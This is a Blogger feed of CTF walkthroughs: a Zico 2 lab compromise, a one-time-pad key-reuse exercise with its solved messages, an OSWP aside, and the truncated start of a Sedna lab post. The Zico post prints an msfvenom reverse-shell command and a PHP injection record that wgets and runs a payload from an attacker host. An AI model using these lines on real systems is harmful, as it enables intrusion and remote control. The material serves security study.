tag:blogger.com,1999:blog-31598905629027179132024-03-05T22:42:45.339+01:00CTF SolutionsThe blog presents a walkthroughs of Capture The Flag Challenges.rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comBlogger76125tag:blogger.com,1999:blog-3159890562902717913.post-27755987566501212562017-10-26T11:01:00.000+02:002017-10-27T09:52:35.756+02:00Zico 2 challengeHello all,<br />
<br />
Zico is trying to build his website but is having some trouble in choosing what CMS to use. After some tries on a few popular ones, he decided to build his own. Was that a good idea?<br />
<br />
Let's try to verify it.<br />
<br />
The first of all, we should scan our target<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOweCllyMxT430TOODq0C9JVlZhBXK5g8L8yFmBS7bPXX5eo8K-n1V63JvedLV6DHfYOKWaVfayYfA8CYfdGnLuxSLj_yjy_028JJ-hS3yKchqREHxR6L2SHlyFuG43KfyHRLN2Gxnnps/s1600/scan-port_top_100.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="167" data-original-width="887" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOweCllyMxT430TOODq0C9JVlZhBXK5g8L8yFmBS7bPXX5eo8K-n1V63JvedLV6DHfYOKWaVfayYfA8CYfdGnLuxSLj_yjy_028JJ-hS3yKchqREHxR6L2SHlyFuG43KfyHRLN2Gxnnps/s640/scan-port_top_100.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I had to scan only 100 top ports, because scanning all ports consume a lot of time.<br />
<br />
As always let's begin pentest from web application.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvcEnFULyynKb9syJhM4vjfTCcfaaKusyKw2IFtDGhkvKdmTtKLIeJaCPvAmE3LQqJuyYqNS5XgXBxRGT2ZPGud3IiIydA7WBMZ1Eifp_t50DR45_o94-xngimh0caj9bzFYQNZqAw4lg/s1600/web_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1600" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvcEnFULyynKb9syJhM4vjfTCcfaaKusyKw2IFtDGhkvKdmTtKLIeJaCPvAmE3LQqJuyYqNS5XgXBxRGT2ZPGud3IiIydA7WBMZ1Eifp_t50DR45_o94-xngimh0caj9bzFYQNZqAw4lg/s640/web_1.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, let's enumerate it using dirb.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM-fLvRQ2Hy_NNT84-uatFndOoJXB-EhyNtf1vMa9HMvnFeX8x2b_Kps0AUkbXKATVlwkT5KjOuQMPt3nVzmZx6CSNHreW8yrPxOeLO6-1iSTCLdI9PZTaT-n69nXj12CrXZXglxWF3ag/s1600/dirb.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="300" data-original-width="558" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM-fLvRQ2Hy_NNT84-uatFndOoJXB-EhyNtf1vMa9HMvnFeX8x2b_Kps0AUkbXKATVlwkT5KjOuQMPt3nVzmZx6CSNHreW8yrPxOeLO6-1iSTCLdI9PZTaT-n69nXj12CrXZXglxWF3ag/s400/dirb.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b>/dbadmin/</b> looks very interesting... Look at it deeper.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgedusG1C26OhfHxW9hRqRNrvrLhTWNJaLvby93twJBZnaCOiWxpKxMsTj9e94PwQRWPKi_FEClixBrjrum165SieQ6HvxmjzenoH3X0m8xxOJ-SQAPmSNy-KCdnG1osyRRNGYSMynMPMg/s1600/web_2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="290" data-original-width="506" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgedusG1C26OhfHxW9hRqRNrvrLhTWNJaLvby93twJBZnaCOiWxpKxMsTj9e94PwQRWPKi_FEClixBrjrum165SieQ6HvxmjzenoH3X0m8xxOJ-SQAPmSNy-KCdnG1osyRRNGYSMynMPMg/s320/web_2.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Let's click on the <b>test_db.php</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggF2QaKDCyuP2ZCE4l29DidXSi540lemgr1rQPGGvlpjoig0bMxikYfgtMNasSc_u8X489FhaluSQIQP9KQWc-_yyfdlYB-PZBXQZkAlQVschJSCOSDM3MrLAJk5hyphenhyphenLPIh-to2Ia6DeeE/s1600/db.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="254" data-original-width="588" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggF2QaKDCyuP2ZCE4l29DidXSi540lemgr1rQPGGvlpjoig0bMxikYfgtMNasSc_u8X489FhaluSQIQP9KQWc-_yyfdlYB-PZBXQZkAlQVschJSCOSDM3MrLAJk5hyphenhyphenLPIh-to2Ia6DeeE/s320/db.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Hmmm, password... We don't know any password. But, we can see <b>phpLiteAdmin v1.9.3</b>, as far as I know, this version is vulnerable to PHP Code Injection.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6zTbazczFF7-YZOnvGPWTiDwWDHKIuBrCfGj6yZivE3KAvTuyK-MGsqB8doR7BUuYISK-pk09NI_gp1bLd3oW1E1afiWOjDNBP96S6a0fqPui7MqvqQUKH5ThyS1r24l0XS-PbMcKYDo/s1600/exploit.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="180" data-original-width="542" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6zTbazczFF7-YZOnvGPWTiDwWDHKIuBrCfGj6yZivE3KAvTuyK-MGsqB8doR7BUuYISK-pk09NI_gp1bLd3oW1E1afiWOjDNBP96S6a0fqPui7MqvqQUKH5ThyS1r24l0XS-PbMcKYDo/s320/exploit.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent, let's try also guess the password to admin panel.<br />
Yes! <b>admin</b> is a valid password.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj41wVX0j_vhTVi5OKRGtppfdO3uLhPpw_qd0VohNe9zQuPWpnsLEivOyKVIxOC5DWUNwdxaQmeWZ8BHFxxwKgaaFhitlwWMhr2ONQ4Qk3F624EL54eqzIi56emXiWh4GFrkrrptjONxXY/s1600/panel.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="604" data-original-width="1323" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj41wVX0j_vhTVi5OKRGtppfdO3uLhPpw_qd0VohNe9zQuPWpnsLEivOyKVIxOC5DWUNwdxaQmeWZ8BHFxxwKgaaFhitlwWMhr2ONQ4Qk3F624EL54eqzIi56emXiWh4GFrkrrptjONxXY/s320/panel.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! Now, we can use our exploit.<br />
We have created new database named <b>hack.php</b>.<br />
The database hack.php contains only one table, with one record. The record is as follow <b><?php phpinfo(); ?></b>, and now let's execute it.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBclBrSb8Nc6bb1itzMk5txWmCr0pth1cEA5Q353RFakSvPajtE74UITAZmsbofLcHrxePl7j6dcXiOKP6Pi1F3gchWlROo3r9lT_l5mOiH7gKjHDSwbZLDPoR1TzRQII7zNxMayO3LRE/s1600/db1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="779" data-original-width="1321" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBclBrSb8Nc6bb1itzMk5txWmCr0pth1cEA5Q353RFakSvPajtE74UITAZmsbofLcHrxePl7j6dcXiOKP6Pi1F3gchWlROo3r9lT_l5mOiH7gKjHDSwbZLDPoR1TzRQII7zNxMayO3LRE/s320/db1.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! We did PoC. Now, let's edit record from PoC to reverse shell.<br />
I was trying upload and execute PHP reverse shell, but without success. S, maybe let's try play with ELF file.<br />
We have to upload php file first and the file will be responsible for <b>wget</b> ELF file into server, then we will be able to execute the ELF file.<br />
<br />
Generated payload<br />
<blockquote class="tr_bq">
msfvenom -a x86 -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=53 -f elf -o shell</blockquote>
Record in table<br />
<blockquote class="tr_bq">
<?php exec("cd /tmp; wget http://192.168.56.1/shell; chmod a+x shell; ./shell"); ?></blockquote>
<br />
So, now we have to execute Metasploit meterpreter<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdW3cFx6QI3NxjNBIP8FFe_NMnUMfDgo2FjtlkiC6E9xLlPGOfTGRBw2gVWl93vVI6XLVbygDYXmMsfDWBVqlpW-JM9T9BWPqLOA0grtbquzQm8dKfxq0wASImf3pA5mfLWPGdKC-keVs/s1600/shell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="204" data-original-width="493" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdW3cFx6QI3NxjNBIP8FFe_NMnUMfDgo2FjtlkiC6E9xLlPGOfTGRBw2gVWl93vVI6XLVbygDYXmMsfDWBVqlpW-JM9T9BWPqLOA0grtbquzQm8dKfxq0wASImf3pA5mfLWPGdKC-keVs/s320/shell.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent, we have got limited shell.<br />
In <b>/home/zico/wordpress</b> directory I have found wp-config.php file, which contains db password for <b>zico</b> user. Let's try use it to change permission from www-data user to zico user.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAI-GxyqZfZudXvPIcXuPXRsbnEgCdJBbdYY_pOeCfCCkuuyIhxRVD1wlckeo_F_Xy7iVPJgusjH5FeYFVkIIplF7LMk1xhyphenhyphenw5EUdd2CNpB-p6NFmjCGSMJoGDCq9r67_sSpSfwSlZigM/s1600/zico.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="275" data-original-width="468" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAI-GxyqZfZudXvPIcXuPXRsbnEgCdJBbdYY_pOeCfCCkuuyIhxRVD1wlckeo_F_Xy7iVPJgusjH5FeYFVkIIplF7LMk1xhyphenhyphenw5EUdd2CNpB-p6NFmjCGSMJoGDCq9r67_sSpSfwSlZigM/s320/zico.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nice.<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-53631872832441332332017-07-31T13:37:00.001+02:002017-08-01T10:37:09.129+02:00Taking advantage of one-time pad key reuseHello,<br />
Today we will have pleasure play with cryptoanalysis of One-Time Pad.<br />
<br />
We have following scenario:<br />
Someone was using the same key for several different messages. We were able to capture these ciphertexts and we we want to decrypt them.<br />
We know that sender was very lazy and used the same key for each messages.<br />
<br />
We know that:<br />
<b>c_i = m_i XOR k</b><br />
where:<br />
<b>c_i</b> - cipher text<br />
<b>m_i </b>- message in plaintext<br />
<b>k </b>- key which has been used to encrypt messages (every time the same)<br />
<br />
Captured ciphertexts:<br />
<blockquote class="tr_bq">
<span class="c-assess-question-title" data-js="prompt"></span><br />
<b>ciphertext #1:</b><br />
315c4eeaa8b5f8aaf9174145bf43e1784b8fa00dc71d885a804e5ee9fa40b16349c146fb778cdf2d3aff021dfff5b403b510d0d0455468aeb98622b137dae857553ccd8883a7bc37520e06e515d22c954eba5025b8cc57ee59418ce7dc6bc41556bdb36bbca3e8774301fbcaa3b83b220809560987815f65286764703de0f3d524400a19b159610b11ef3e<br />
<b>ciphertext #2:</b><br />
234c02ecbbfbafa3ed18510abd11fa724fcda2018a1a8342cf064bbde548b12b07df44ba7191d9606ef4081ffde5ad46a5069d9f7f543bedb9c861bf29c7e205132eda9382b0bc2c5c4b45f919cf3a9f1cb74151f6d551f4480c82b2cb24cc5b028aa76eb7b4ab24171ab3cdadb8356f<br />
<b>ciphertext #3:</b><br />
32510ba9a7b2bba9b8005d43a304b5714cc0bb0c8a34884dd91304b8ad40b62b07df44ba6e9d8a2368e51d04e0e7b207b70b9b8261112bacb6c866a232dfe257527dc29398f5f3251a0d47e503c66e935de81230b59b7afb5f41afa8d661cb<br />
<b>ciphertext #4:</b><br />
32510ba9aab2a8a4fd06414fb517b5605cc0aa0dc91a8908c2064ba8ad5ea06a029056f47a8ad3306ef5021eafe1ac01a81197847a5c68a1b78769a37bc8f4575432c198ccb4ef63590256e305cd3a9544ee4160ead45aef520489e7da7d835402bca670bda8eb775200b8dabbba246b130f040d8ec6447e2c767f3d30ed81ea2e4c1404e1315a1010e7229be6636aaa<br />
<b>ciphertext #5:</b><br />
3f561ba9adb4b6ebec54424ba317b564418fac0dd35f8c08d31a1fe9e24fe56808c213f17c81d9607cee021dafe1e001b21ade877a5e68bea88d61b93ac5ee0d562e8e9582f5ef375f0a4ae20ed86e935de81230b59b73fb4302cd95d770c65b40aaa065f2a5e33a5a0bb5dcaba43722130f042f8ec85b7c2070<br />
<b>ciphertext #6:</b><br />
32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd2061bbde24eb76a19d84aba34d8de287be84d07e7e9a30ee714979c7e1123a8bd9822a33ecaf512472e8e8f8db3f9635c1949e640c621854eba0d79eccf52ff111284b4cc61d11902aebc66f2b2e436434eacc0aba938220b084800c2ca4e693522643573b2c4ce35050b0cf774201f0fe52ac9f26d71b6cf61a711cc229f77ace7aa88a2f19983122b11be87a59c355d25f8e4<br />
<b>ciphertext #7:</b><br />
32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd90f1fa6ea5ba47b01c909ba7696cf606ef40c04afe1ac0aa8148dd066592ded9f8774b529c7ea125d298e8883f5e9305f4b44f915cb2bd05af51373fd9b4af511039fa2d96f83414aaaf261bda2e97b170fb5cce2a53e675c154c0d9681596934777e2275b381ce2e40582afe67650b13e72287ff2270abcf73bb028932836fbdecfecee0a3b894473c1bbeb6b4913a536ce4f9b13f1efff71ea313c8661dd9a4ce<br />
<b>ciphertext #8:</b><br />
315c4eeaa8b5f8bffd11155ea506b56041c6a00c8a08854dd21a4bbde54ce56801d943ba708b8a3574f40c00fff9e00fa1439fd0654327a3bfc860b92f89ee04132ecb9298f5fd2d5e4b45e40ecc3b9d59e9417df7c95bba410e9aa2ca24c5474da2f276baa3ac325918b2daada43d6712150441c2e04f6565517f317da9d3<br />
<b>ciphertext #9:</b><br />
271946f9bbb2aeadec111841a81abc300ecaa01bd8069d5cc91005e9fe4aad6e04d513e96d99de2569bc5e50eeeca709b50a8a987f4264edb6896fb537d0a716132ddc938fb0f836480e06ed0fcd6e9759f40462f9cf57f4564186a2c1778f1543efa270bda5e933421cbe88a4a52222190f471e9bd15f652b653b7071aec59a2705081ffe72651d08f822c9ed6d76e48b63ab15d0208573a7eef027<br />
<b>ciphertext #10:</b><br />
466d06ece998b7a2fb1d464fed2ced7641ddaa3cc31c9941cf110abbf409ed39598005b3399ccfafb61d0315fca0a314be138a9f32503bedac8067f03adbf3575c3b8edc9ba7f537530541ab0f9f3cd04ff50d66f1d559ba520e89a2cb2a83</blockquote>
We know how XOR works, and we should exploit the knowledge<br />
<blockquote class="tr_bq">
<b>c_i XOR c_j = m_i XOR m_j XOR k XOR k = m_i XOR m_j </b></blockquote>
So, if we guess some part of message (for example i) then we should get a part of plain text comes from message j - becuase:<br />
<blockquote class="tr_bq">
<b>m_i XOR m_i XOR m_j = m_j</b></blockquote>
The most popular word in English are for example: <b>The, he, ing</b>, etc.<br />
Let's write a short script to decrypt the messages<br />
<br />
First version of the script<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim8rxseLU4ON1gEr654yaZ9_d-Xzx66Lu7rDGk923hOmj_pGzcWq80ZAmakKL5qF1LDs9Xj6AwaehzSj7wrAaReMM4ajNAOR49SNrNnQ_iDa-g6qXOin_xvMQMlkb72JmoP_4-mPqzgDE/s1600/coursera1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="515" data-original-width="799" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim8rxseLU4ON1gEr654yaZ9_d-Xzx66Lu7rDGk923hOmj_pGzcWq80ZAmakKL5qF1LDs9Xj6AwaehzSj7wrAaReMM4ajNAOR49SNrNnQ_iDa-g6qXOin_xvMQMlkb72JmoP_4-mPqzgDE/s1600/coursera1.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We have done final code as below<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibh873utB7RLZIfkbpMoK1hdWvjuoVRYVBu3LkPf5bT7ql0N3ieqa_JlQIIkgeXj2h3qD4xdS_QU6IyVP8-1vAGJ87ScBTaZ8WwLRJqnVYTx1NY6TXNUHaQsvWm_DdTwgJW5tuAOZZXU4/s1600/final.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="551" data-original-width="844" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibh873utB7RLZIfkbpMoK1hdWvjuoVRYVBu3LkPf5bT7ql0N3ieqa_JlQIIkgeXj2h3qD4xdS_QU6IyVP8-1vAGJ87ScBTaZ8WwLRJqnVYTx1NY6TXNUHaQsvWm_DdTwgJW5tuAOZZXU4/s1600/final.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now we are able to guess each of the messages.<br />
<br />
Result:<br />
<blockquote class="tr_bq">
<table class="highlight tab-size js-file-line-container" data-tab-size="8"><tbody>
<tr><td class="blob-code blob-code-inner js-file-line" id="LC106"></td>
</tr>
<tr>
</tr>
</tbody></table>
<table class="highlight tab-size js-file-line-container" data-tab-size="8"><tbody>
<tr><td class="blob-code blob-code-inner js-file-line" id="LC107"></td>
</tr>
<tr>
</tr>
</tbody></table>
<table class="highlight tab-size js-file-line-container" data-tab-size="8"><tbody>
<tr><td class="blob-code blob-code-inner js-file-line" id="LC108"><b><span class="pl-c"><span class="pl-c">Messages:</span></span></b></td>
</tr>
<tr>
</tr>
</tbody></table>
<table class="highlight tab-size js-file-line-container" data-tab-size="8"><tbody>
<tr><td class="blob-code blob-code-inner js-file-line" id="LC109"><span class="pl-c"><span class="pl-c">m_1 = w</span>e can factor the number 15 with quantum computers. We can also factor the number 15 with a dog trained to bark three times - Robert Harley</span></td>
</tr>
<tr>
</tr>
</tbody></table>
<table class="highlight tab-size js-file-line-container" data-tab-size="8"><tbody>
<tr><td class="blob-code blob-code-inner js-file-line" id="LC110"><span class="pl-c">m_2 = Euler would probably enjoy that now his theorem becomes a corner stone of crypto - Annonymous on Euler's theorem</span></td>
</tr>
<tr>
</tr>
</tbody></table>
<table class="highlight tab-size js-file-line-container" data-tab-size="8"><tbody>
<tr><td class="blob-code blob-code-inner js-file-line" id="LC111"><span class="pl-c"><span class="pl-c">m_3 =</span> The nice thing about Keeyloq is now we cryptographers can drive a lot of fancy cars - Dan Boneh</span></td>
</tr>
<tr>
</tr>
</tbody></table>
<table class="highlight tab-size js-file-line-container" data-tab-size="8"><tbody>
<tr><td class="blob-code blob-code-inner js-file-line" id="LC112"><span class="pl-c">m_4 = The ciphertext produced by a weak encryption algorithm looks as good as ciphertext produced by a strong encryption algorithm - Philip Zimmermann</span></td>
</tr>
<tr>
</tr>
</tbody></table>
<table class="highlight tab-size js-file-line-container" data-tab-size="8"><tbody>
<tr><td class="blob-code blob-code-inner js-file-line" id="LC113"><span class="pl-c">m_5 = You don't want to buy a set of car keys from a guy who specializes in stealing cars - Marc Rotenberg commenting on Clipper</span></td>
</tr>
<tr>
</tr>
</tbody></table>
<table class="highlight tab-size js-file-line-container" data-tab-size="8"><tbody>
<tr><td class="blob-code blob-code-inner js-file-line" id="LC114"><span class="pl-c"><span class="pl-c">m_6 =</span> There are two types of cryptography - that which will keep secrets safe from your little sister, and that which will keep secrets safe from your government - Bruce Schneier</span></td>
</tr>
<tr>
</tr>
</tbody></table>
<table class="highlight tab-size js-file-line-container" data-tab-size="8"><tbody>
<tr><td class="blob-code blob-code-inner js-file-line" id="LC115"><span class="pl-c"><span class="pl-c">m_7 =</span> There are two types of cyptography: one that allows the Government to use brute force to break the code, and one that requires the Government to use brute force to break you</span></td>
</tr>
<tr>
</tr>
</tbody></table>
<table class="highlight tab-size js-file-line-container" data-tab-size="8"><tbody>
<tr><td class="blob-code blob-code-inner js-file-line" id="LC116"><span class="pl-c"><span class="pl-c">m_8 =</span> We can see the point where the chip is unhappy if a wrong bit is sent and consumes more power from the environment - Adi Shamir</span></td>
</tr>
<tr>
</tr>
</tbody></table>
<table class="highlight tab-size js-file-line-container" data-tab-size="8"><tbody>
<tr><td class="blob-code blob-code-inner js-file-line" id="LC117"><span class="pl-c"><span class="pl-c">m_9 =</span> A (private-key) encryption scheme states 3 algorithms, namely a procedure for generating keys, a procedure for encrypting, and a procedure for decrypting.?</span></td>
</tr>
<tr>
</tr>
</tbody></table>
<table class="highlight tab-size js-file-line-container" data-tab-size="8"><tbody>
<tr><td class="blob-code blob-code-inner js-file-line" id="LC118"><span class="pl-c"><span class="pl-c">m_10 = </span>The Concise OxfordDictionary (2006) defines crypto as the art of writing o r solving codes. </span></td>
</tr>
<tr>
</tr>
</tbody></table>
<span class="pl-c"><span class="pl-c">goal =</span> <b>The secret message is: When using a stream cipher, never use the key more than once</b></span></blockquote>
rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-8902400142508078772017-05-25T14:23:00.004+02:002017-05-25T14:23:49.294+02:00OSWPHello guys,<br />
I would like to apologize that I didn't write any posts for a long time, but I have a very good excuse - I was working on my OSWP :-)<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-9797436259780599842017-03-27T13:40:00.000+02:002017-03-27T13:40:49.228+02:00Sedna challengeHello,<br />
<br />
Today I want to show you a Sedna hackfest walkthrough.<br />
<br />
Scanning<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCVJ3uozeqTXmPjp0XW4RsYiC0COeJu5EAIu-FiWqgVhVMjQrw9SwUtalRIdk0qwMzez30eYH6-lDj9kIRFqUX0cNT7dt10rjFz-_Bg8VNoKN-c890kzxy8GMggJjXqW8UyDDG9gqzCSE/s1600/nmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCVJ3uozeqTXmPjp0XW4RsYiC0COeJu5EAIu-FiWqgVhVMjQrw9SwUtalRIdk0qwMzez30eYH6-lDj9kIRFqUX0cNT7dt10rjFz-_Bg8VNoKN-c890kzxy8GMggJjXqW8UyDDG9gqzCSE/s640/nmap.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
There are a lot of open ports. I was trying play with Samba, but there is nothing interesting except version - 4.6.1 (I didn't find valid exploit for this version of Samba).<br />
I was trying browse port 8080, but to manager's panel I need to know valid web based authentication credentials. Default credentials such as: admin:admin and tomcat:tomcat don't work.<br />
<br />
So, I decided to browse 80 port.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZuKwVz4X-jQSSxFvS9LXkFX_ViBrfOq6grfUvb3qSulsEPHoxgjtPX-GwENrGETx9ayMVFtrN462QLpBWWGWmElKGfKeCzZA-p5bqJZMY-VSNOT6_K_Mv6rZJhWTIqwICpFZ7UZ5L7IY/s1600/web.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZuKwVz4X-jQSSxFvS9LXkFX_ViBrfOq6grfUvb3qSulsEPHoxgjtPX-GwENrGETx9ayMVFtrN462QLpBWWGWmElKGfKeCzZA-p5bqJZMY-VSNOT6_K_Mv6rZJhWTIqwICpFZ7UZ5L7IY/s640/web.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, let's run DirBuster to find the web application directories structure.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7yE37uyavVdr64auTj1PEs9xsKZHq-PC3ugXgBCtH4cnwHvJo8r1K3YATZkKdgModr6J1g3cDcAHiafI6uEkfRXOltdog_t2J3ezRs5Y0L7LFfIGQLTl4XZicN_Q6BuNSAlnvWTy4l8Y/s1600/dirbu.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7yE37uyavVdr64auTj1PEs9xsKZHq-PC3ugXgBCtH4cnwHvJo8r1K3YATZkKdgModr6J1g3cDcAHiafI6uEkfRXOltdog_t2J3ezRs5Y0L7LFfIGQLTl4XZicN_Q6BuNSAlnvWTy4l8Y/s400/dirbu.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Hmmm, unfortunately I didn't find entry point to hack the target.<br />
So, because I didn't have some interesting idea I decided to run nikto vulnerability scanner and it found <b>license.txt</b> file, which may be interesting...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrEv-_vb3_ed7EFq_LpRtQUHXWyw843tkfJtwkMy4sdvU0i02nahR3cPRd_dudM6-s1FNO_qBSjAwNeHrIrovDe478Do61085Qf4Y9yvY2OLwHNXcgAtAvPA4ClTO7ZvKIK7nqAQmXam8/s1600/nito.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrEv-_vb3_ed7EFq_LpRtQUHXWyw843tkfJtwkMy4sdvU0i02nahR3cPRd_dudM6-s1FNO_qBSjAwNeHrIrovDe478Do61085Qf4Y9yvY2OLwHNXcgAtAvPA4ClTO7ZvKIK7nqAQmXam8/s640/nito.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Running /license.txt I found something juicy.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAZcPR97qGRGk5-Yt8a5xxYSNB2NGOx9Wib6vEd_GYqWFtb5BTb-j6jcuuvCX-O4uIm3ry4mS3lGUNME3QGvlL_fT-QlO-eDxVgnGHeIcNcz06-ygTlqXkIyWvsYh4ch7PGCTtqdTqcB8/s1600/license.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAZcPR97qGRGk5-Yt8a5xxYSNB2NGOx9Wib6vEd_GYqWFtb5BTb-j6jcuuvCX-O4uIm3ry4mS3lGUNME3QGvlL_fT-QlO-eDxVgnGHeIcNcz06-ygTlqXkIyWvsYh4ch7PGCTtqdTqcB8/s400/license.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
This page provided us to information that web application utilizes BuilderEngine. I was looking for valid exploit and BINGO!<br />
We are able to use - "BuilderEngine 3.5.0 - Arbitrary File Upload".<br />
